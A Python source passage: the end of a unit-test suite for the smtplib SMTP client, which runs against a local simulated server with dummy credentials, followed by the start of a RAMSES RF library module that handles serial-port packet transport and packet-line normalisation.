smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
threading.Thread(target=server, args=servargs).start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_user = 'TXIUQUBZB21LD2HLCMUUY29T'
sim_auth_plain = 'AE1YLKFAC29TZXDOZXJLLMNVBQBZB21LCGFZC3DVCMQ='
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
mech = arg.strip().lower()
if mech=='cram-md5':
self.push('334 {}'.format(sim_cram_md5_challenge))
elif mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
elif mech=='plain':
self.push('334 ')
elif mech=='login':
self.push('334 ')
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(email)),
"ascii"))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
# SimSMTPChannel doesn't fully support AUTH because it requires a
# synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_plain, str(err))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_login_user, str(err))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_credentials['cram-md5'], str(err))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_login_user, str(err))
smtp.close()
def test_auth_function(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
self.serv.add_feature("AUTH CRAM-MD5")
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
supported = {'CRAM-MD5': smtp.auth_cram_md5,
'PLAIN': smtp.auth_plain,
'LOGIN': smtp.auth_login,
}
for mechanism, method in supported.items():
try: smtp.auth(mechanism, method)
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_credentials[mechanism.lower()].upper(),
str(err))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests,
TooLongLineTests)
if __name__ == '__main__':
test_main()
|
transport.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
"""RAMSES RF - RAMSES-II compatble Packet processor.
Operates at the pkt layer of: app - msg - pkt - h/w
"""
import asyncio
import logging
import os
import re
import sys
from datetime import datetime as dt
from datetime import timedelta as td
from multiprocessing import Process
from queue import Queue
from string import printable # ascii_letters, digits
from threading import Lock, Thread
from types import SimpleNamespace
from typing import ByteString, Callable, Generator, Optional, Tuple
from serial import SerialException, serial_for_url
from serial_asyncio import SerialTransport as SerTransportAsync
from .command import (
ARGS,
DEAMON,
FUNC,
QOS_MAX_BACKOFF,
QOS_RX_TIMEOUT,
QOS_TX_RETRIES,
QOS_TX_TIMEOUT,
Command,
Priority,
)
from .const import _PUZZ, HGI_DEVICE_ID, NON_DEVICE_ID, NUL_DEVICE_ID, __dev_mode__
from .exceptions import InvalidPacketError
from .helpers import dt_now
from .packet import Packet
from .protocol import create_protocol_factory
from .schema import SERIAL_CONFIG_SCHEMA
from .version import VERSION
DEV_MODE = __dev_mode__ and False
_LOGGER = logging.getLogger(__name__)
# _LOGGER.setLevel(logging.WARNING) # INFO may have too much detail
if DEV_MODE: # or True:
_LOGGER.setLevel(logging.DEBUG) # should be INFO
BLOCK_LIST = "block_list"
KNOWN_LIST = "known_list"
IS_INITIALIZED = "IS_INITIALIZED"
IS_EVOFW3 = "is_evofw3"
DEVICE_ID = "device_id"
DEFAULT_SERIAL_CONFIG = SERIAL_CONFIG_SCHEMA({})
ERR_MSG_REGEX = re.compile(r"^([0-9A-F]{2}\.)+$")
POLLER_TASK = "poller_task"
Pause = SimpleNamespace(
NONE=td(seconds=0),
MINIMUM=td(seconds=0.01),
SHORT=td(seconds=0.05),
DEFAULT=td(seconds=0.15),
LONG=td(seconds=0.5),
)
VALID_CHARACTERS = printable # "".join((ascii_letters, digits, ":-<*# "))
INIT_QOS = {"priority": Priority.HIGHEST, "retries": 24, "disable_backoff": True}
INIT_CMD = Command._puzzle(message=f"v{VERSION}", **INIT_QOS)
# evofw3 commands (as of 0.7.0) include (from cmd.c):
# case 'V': validCmd = cmd_version( cmd ); break;
# case 'T': validCmd = cmd_trace( cmd ); break;
# case 'B': validCmd = cmd_boot( cmd ); break;
# case 'C': validCmd = cmd_cc1101( cmd ); break;
# case 'F': validCmd = cmd_cc_tune( cmd ); break;
# case 'E': validCmd = cmd_eeprom( cmd ); break;
# !F - indicate autotune status
# !FT - start autotune
# !FS - save autotune
def _normalise(pkt_line: str, log_file: bool = False) -> str:
"""Perform any packet line hacks, as required.
Goals:
- ensure an evofw3 provides the exact same output as a HGI80
- handle 'strange' packets (e.g. I/08:/0008)
- correct any historical design failures (e.g. puzzle packets with an index)
"""
# bug fixed in evofw3 v0.6.x...
# 095 I --- 18:013393 18:000730 --:------ 0001 005 00FFFF0200 # HGI80
# 000 I --- 18:140805 18:140805 --:------ 0001 005 00FFFF0200 # evofw3
if pkt_line[10:14] == " 18:" and pkt_line[11:20] == pkt_line[21:30]:
pkt_line = pkt_line[:21] + HGI_DEVICE_ID + pkt_line[30:]
(_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
"evofw3 packet line has been normalised (0x00)"
)
# psuedo-RAMSES-II packets...
elif pkt_line[10:14] in (" 08:", " 31:") and pkt_line[-16:] == "* Checksum error":
pkt_line = pkt_line[:-17] + " # Checksum error (ignored)"
(_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
"Packet line has been normalised (0x01)"
)
# bug fixed in evofw3 v0.6.x...
elif pkt_line[:2] == "!C":
pkt_line = "# " + pkt_line
(_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
"Packet line has been normalised (0x02)"
)
# # TODO: very old evofw3 - taken out because expensive
# elif ERR_MSG_REGEX.match(pkt_line):
# pkt_line = "# " + pkt_line
# (_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
# "Packet line has been normalised (0x03)"
# )
if not log_file:
return pkt_line
pkt_line = pkt_line.strip()
# HACK for v0.11.x and earlier - puzzle packets should have no index
if pkt_line[41:45] == _PUZZ and (pkt_line[:2] != "00" or pkt_line[:4] != "0000"):
payload = f"00{pkt_line[50:]}"[:96]
pkt_line = pkt_line[:46] + f"{int(len(payload)/2):03} " + payload
(_LOGGER.warning if DEV_MODE else _LOGGER.debug)(
"Packet line has been normalised (0x04)"
)
return pkt_line
def _str(value: ByteString) -> str:
try:
result = "".join(
c
for c in value.decode("ascii", errors="strict").strip()
if c in VALID_CHARACTERS
)
except UnicodeDecodeError:
_LOGGER.warning("%s << Cant decode bytestream (ignoring)", value)
return ""
return result
class SerTransportRead(asyncio.ReadTransport):
"""Interface for a packet transport via a dict (saved state) or a file (pkt log)."""
def __init__(self, loop, protocol, packet_source, extra=None):
self._loop = loop
self._protocol = protocol
self._packets = packet_source
self._extra = {} if extra is None else extra
self._protocol.pause_writing()
self._start()
def _start(self):
self._extra[POLLER_TASK] = self._loop.create_task(self._polling_loop())
async def _polling_loop(self):
self._protocol.connection_made(self)
if isinstance(self._packets, dict): # can assume dtm_str is OK
for dtm_str, pkt_line in self._packets.items():
self._protocol.data_received(f"{dtm_str} {pkt_line}")
await asyncio.sleep(0)
else:
for dtm_pkt_line in self._packets: # need to check dtm_str is OK
self._protocol.data_received(dtm_pkt_line) # .rstrip())
await asyncio.sleep(0)
self._protocol.connection_lost(exc=None) # EOF
class SerTransportPoll(asyncio.Transport):
"""Interface for a packet transport using polling."""
MAX_BUFFER_SIZE = 500
def __init__(self, loop, protocol, ser_instance, extra=None):
self._loop = loop
self._protocol = protocol
self.serial = ser_instance
self._extra = {} if extra is None else extra
self._is_closing = None
self._write_queue = None
self._start()
def _start(self):
self._write_queue = Queue(maxsize=self.MAX_BUFFER_SIZE)
self._extra[POLLER_TASK] = self._loop.create_task(self._polling_loop())
async def _polling_loop(self):
self._protocol.connection_made(self)
while self.serial.is_open:
await asyncio.sleep(0.001)
if self.serial.in_waiting:
# NOTE: cant use readline(), as it blocks until a newline is received
self._protocol.data_received(self.serial.read(self.serial.in_waiting))
continue
if getattr(self.serial, "out_waiting", False):
# NOTE: rfc2217 ports have no out_waiting attr!
continue
if not self._write_queue.empty():
self.serial.write(self._write_queue.get())
self._write_queue.task_done()
self._protocol.connection_lost(exc=None)
def write(self, cmd):
"""Write some data bytes to the transport.
This does not block; it buffers the data and arranges for it to be sent out
asynchronously.
"""
self._write_queue.put_nowait(cmd)
class _SerTransportProc(Process): # TODO: WIP
"""Interface for a packet transport using a process - WIP."""
def __init__(self, loop, protocol, ser_port, extra=None):
self._loop = loop
self._protocol = protocol
